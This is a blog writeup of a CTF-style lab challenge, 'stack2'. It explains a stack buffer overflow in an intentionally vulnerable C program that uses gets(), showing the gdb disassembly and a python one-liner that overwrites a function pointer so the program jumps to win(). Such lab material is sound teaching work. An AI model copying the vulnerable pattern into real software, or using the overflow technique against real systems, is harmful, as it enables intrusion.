---
title:  "stack2 Writeup"
date:   2019-04-18 17:00:00
categories: writeup 
layout: post
---
# stack2 Overview
##### by Aidan O'Keefe

```c
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
  char buffer[64];
  FILE *fp;

  printf("code flow successfully changed\n");
  
  fp  = fopen("./flag.txt", "r");
  fgets(buffer, 64, (FILE*)fp);
  printf("flag: %s\n", buffer );
  exit(0);
}

int main(int argc, char **argv)
{
  volatile int (*fp)();
  char buffer[64];

  fp = 0;

  gets(buffer);

  if(fp) {
      printf("calling function pointer, jumping to 0x%08x\n", fp);
      fp();
  }
}
```

stack2 is a variation on concepts introduced in stack0 and stack1 about buffer overflows. In the past, when attacking these buffer overflow problems, we would try to overwrite a specific variable to match a given value, or to hold a value at all.

stack2 eschews this by instead providing us with the same vulnerability we've attacked in the past (via gets) but instead tasking us with overwriting a function pointer that will be called in the future. This is a very exaggerated example (don't expect many real binaries to feature such a blatant vulnerability) to teach us the concepts behind function pointers.

We are focused primarily on the last if statement in main, which holds the key to executing our exploit. As we can see above, fp is set to 0 by default. We can open up stack2 in gdb and run the command 'disas main' to see where this falls on the stack:

```asm
0x0804857c <+17>:    mov    DWORD PTR [ebp-0xc],0x0
0x08048583 <+24>:    sub    esp,0xc
0x08048586 <+27>:    lea    eax,[ebp-0x4c]
0x08048589 <+30>:    push   eax
```

We can see that we are moving the value for fp to 'ebp-0xc'. We also see via the lea and push instructions that the start of our stack is being placed 0x4c bytes away; with a quick subtraction, we can see that the size of our buffer is therefore 0x4c - 0xc = 64 bytes. We can also find this by running the function with strings of increasing length using python to print the same character (for instance, 'A') until we seg-fault by trying to access code at 0x41414141. Why does this cause a segfault? Let's look further inside main in gdb:

```asm
0x08048592 <+39>:    cmp    DWORD PTR [ebp-0xc],0x0
0x08048596 <+43>:    je     0x80485b0 <main+69>
0x08048598 <+45>:    sub    esp,0x8
0x0804859b <+48>:    push   DWORD PTR [ebp-0xc]
0x0804859e <+51>:    push   0x8048678
0x080485a3 <+56>:    call   0x8048390 <printf@plt>
0x080485a8 <+61>:    add    esp,0x10
0x080485ab <+64>:    mov    eax,DWORD PTR [ebp-0xc]
0x080485ae <+67>:    call   eax
```
When the cmp instruction is run, the program is simply checking to see if the value of fp is not 0. If we have overwritten it, we'll skip the next instruction (which would jump over the inside of the if statement and instead exits the program) and move into the body of the if statement. This prints the value of fp, then tries to call whatever is located at the address that fp points to. If we've loaded an invalid address, such as 0x41414141 (all 'A's!), we'll encounter a segfault. If we've loaded in the value of another function, this will be executed!

 Our goal becomes simple: we need to overwrite this function pointer's value on the stack to the value of win(). How can we accomplish this? First, let's find the address of win by running 'disas win' in gdb:

```asm
Dump of assembler code for function win:
    0x0804850b <+0>:     push   ebp
    0x0804850c <+1>:     mov    ebp,esp
    0x0804850e <+3>:     sub    esp,0x58
    0x08048511 <+6>:     sub    esp,0xc
    0x08048514 <+9>:     push   0x8048640
    0x08048519 <+14>:    call   0x80483c0 <puts@plt>
    0x0804851e <+19>:    add    esp,0x10
    0x08048521 <+22>:    sub    esp,0x8
    0x08048524 <+25>:    push   0x804865f
```

Ah-ha! We can see the location in the text where win is located at is 0x0804850b. Our solution becomes trivial at this point: we need to create an exploit string with our given padding (64 characters) followed by the location of win() in little endian format. Remember that since Linux is little endian, we start with the least significant byte and move right to left:

```
> python -c "print 'A'*64 + '\x0b\x85\x04\x08'" | ./stack2
calling function pointer, jumping to 0x0804850b
code flow successfully changed
flag: hello world!
```

Congratulations! You've now successfully exploited stack2 and are ready to move on to some of the more complex stack problems. Get ready for no-op sleds and shellcode!